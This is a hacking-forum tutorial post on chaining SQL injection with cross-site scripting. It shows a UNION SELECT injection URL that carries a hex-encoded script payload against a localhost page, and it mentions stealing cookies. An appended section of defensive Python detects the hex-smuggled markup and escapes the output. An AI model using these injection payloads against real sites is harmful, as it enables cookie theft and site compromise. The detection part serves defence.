[Tutorial] XSSQLi 01-27-2014, 01:58 PM
#1
[*]Introduction
Hello HC reader. Today I went looking for an SQLi tutorial in this forum, but only found "Union Select Statement", "Easy Injection" and "Noob Injection". So now I will explain to you how to perform XSS via SQL injection (XSSQLi). What do you think we can do if we have an SQLi vulnerability? And what more can we do? "I always find the admin table and the admin page."
Sometimes we inject a site with SQLi, but it doesn't have a login page. So what will you do with this SQLi-vulnerable site? (Skip, or next one?) Don't skip; let's bypass some filters or steal cookies with XSS.
[*]Let's Start
First of all you will need a target which is vulnerable to SQL injection. But let's follow my target.
Quote:localhost/groupinfo.php?show=2
Now we have to find the number of columns and do a UNION statement. I guess you know SQLi well, so let me skip that.
Quote:localhost/groupinfo.php?show=null UNION SELECT 1,2,3,4,5,6--
After that you have found the vulnerable column, so you need to add the XSS payload to the UNION statement, like this:
[*]XSS Payload:
Quote:<script>alert("Hello HC")</script>
[*]Hex Encoded Payload:
Quote:localhost/groupinfo.php?show=null UNION SELECT 1,0x3c7363726970743e616c657274282248656c6c6f20484322293c2f7363726970743e,3,4,5,6--
* Remember: encode your payload into hex, prefixed with 0x.
So, press Enter. We get an alert box.
![[Image: Snap134.png]](http://s12.postimg.org/q0q9izifx/Snap134.png)
Thanks for reading, and if you didn't understand well, PM me.
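The defensive side of the technique in the post above, as an added example that is not part of the original post: a log check that decodes MySQL-style `0x` hex literals in a request and flags any that decode to HTML markup, plus the output encoding that keeps a database value from being rendered as script. The function names are assumptions; the two sample URLs are the ones from the post.

```python
import html
import re
from urllib.parse import unquote_plus, urlsplit

# MySQL-style hex string literal: 0x followed by an even number of hex digits.
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")
UNION_SELECT = re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)
MARKUP = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")

# The two request URLs shown in the post (benign page view, hex-encoded payload).
SAMPLES = [
    "localhost/groupinfo.php?show=2",
    "localhost/groupinfo.php?show=null UNION SELECT 1,"
    "0x3c7363726970743e616c657274282248656c6c6f20484322293c2f7363726970743e"
    ",3,4,5,6--",
]


def decode_hex_literals(query):
    """Return the text hidden behind every 0x... literal in a query string."""
    return [
        bytes.fromhex(m.group(1)).decode("utf-8", "replace")
        for m in HEX_LITERAL.finditer(query)
    ]


def inspect_request(url):
    """Flag UNION SELECT and hex literals that decode to HTML markup."""
    query = unquote_plus(urlsplit("//" + url).query)
    decoded = decode_hex_literals(query)
    return {
        "union_select": bool(UNION_SELECT.search(query)),
        "decoded": decoded,
        "markup_in_hex": [d for d in decoded if MARKUP.search(d)],
    }


def render_cell(value):
    """Output-encode a database value before it is written into the page."""
    return "<td>" + html.escape(str(value), quote=True) + "</td>"


if __name__ == "__main__":
    for url in SAMPLES:
        print(inspect_request(url))
    # Even if the injected row reaches the template, encoding neutralises it.
    print(render_cell(inspect_request(SAMPLES[1])["decoded"][0]))
```

The encoding in `render_cell` only addresses the script execution; the injection itself is closed by binding `show` as a parameter in a prepared statement instead of concatenating it into the query.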